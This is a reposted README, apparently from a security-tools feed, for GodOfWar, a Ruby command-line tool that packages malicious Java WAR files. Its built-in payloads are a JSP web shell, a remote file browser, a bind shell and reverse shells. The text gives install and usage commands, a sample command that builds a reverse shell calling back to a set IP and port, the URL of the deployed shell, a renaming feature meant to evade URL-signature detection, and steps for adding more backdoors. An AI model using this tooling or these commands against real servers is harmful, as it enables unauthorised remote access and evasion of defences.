GodOfWar - Malicious Java WAR Builder With Built-In Payloads


A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.
Features
  • Preexisting payloads. (try -l/--list)
    • cmd_get
    • filebrowser
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • Configurable backdoor. (try --host/-port)
  • Control over payload name.
    • To avoid malicious name after deployment to bypass URL name signatures.

Installation
$ gem install godofwar

Usage
$ godofwar -h 

Help menu:
-p, --payload PAYLOAD Generates war from one of the available payloads.
(check -l/--list)
-H, --host IP_ADDR Local or Remote IP address for the chosen payload
(used with -p/--payload)
-P, --port PORT Local or Remote Port for the chosen payload
(used with -p/--payload)
-o, --output [FILE] Output file and the deployment name.
(default is the payload original name. check '-l/--list')
-l, --list list all available payloads.
-h, --help Show this help message.

Example
List all payloads
$ godofwar -l
├── cmd_get
│   └── Information:
│ ├── Description: Command execution via web interface
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/cmd.jsp?cmd=whoami
│ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│   └── Information:
│ ├── Description: Remote file browser, upload, download, unzip files and native command execution
│ ├── OS: any
│ &#9500 ;── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/filebrowser.jsp
│ ├── References: ["http://www.vonloesch.de/filebrowser.html"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│   └── Information:
│ ├── Description: TCP bind shell
│ ├── OS: any
│ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse-shell.jsp
│ ├── References: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│ └ ── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│   └── Information:
│ ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell_ui.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│   └── Information:
│ ├── De scription: TCP reverse shell. LHOST and LPORT are hardcoded
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
Generate payload with LHOST and LPORT
godofwar -p reverse_shell -H 192.168.100.10  -P 9911 -o puppy
After deployment, you can visit your shell on (http://host:8080/puppy/puppy.jsp)

Contributing
  1. Fork it ( https://github.com/KINGSABRI/godofwar/fork ).
  2. Create your feature branch (git checkout -b my-new-feature).
  3. Commit your changes (git commit -am 'Add some feature').
  4. Push to the branch (git push origin my-new-feature).
  5. Create a new Pull Request.

Add More Backdoors
To contribute by adding more backdoors:
  1. create a new folder under payloads directory.
  2. put your jsp file under the newly created directory (make it the same directory name).
  3. update payloads_info.json file with
    1. description.
    2. supported operating system (try to make it universal though).
    3. configurations: default host and port.
    4. references: the payload origin or its creator credits.



Source: feedproxy.google.com
GodOfWar - Malicious Java WAR Builder With Built-In Payloads GodOfWar - Malicious Java WAR Builder With Built-In Payloads Reviewed by Unknown on 2:24 PM Rating: 5